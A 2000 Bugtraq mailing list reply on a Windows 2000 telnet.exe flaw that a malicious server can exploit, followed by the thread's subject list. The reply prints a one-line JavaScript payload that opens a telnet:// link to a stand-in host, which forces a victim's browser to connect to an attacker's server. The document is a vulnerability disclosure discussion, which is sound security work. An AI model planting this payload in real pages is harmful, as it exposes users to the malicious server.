Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Tim Hollebeek <tim () RSTCORP COM>
Date: Thu, 14 Sep 2000 11:18:21 -0400
During my tests I discovered that IE associates the telnet:// URL with the vulnerable telnet.exe. This opens up several possible ways to force a user into connecting to you with a malicious HTLM web page, email message, and so on. I would speculate that it might also be possible to force this to happen without user intervention with javascript/activeX/java or really creative HTLM.
In fact it's trivial to do so. Use: <script>window.open("telnet://some.host.here")</script>
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)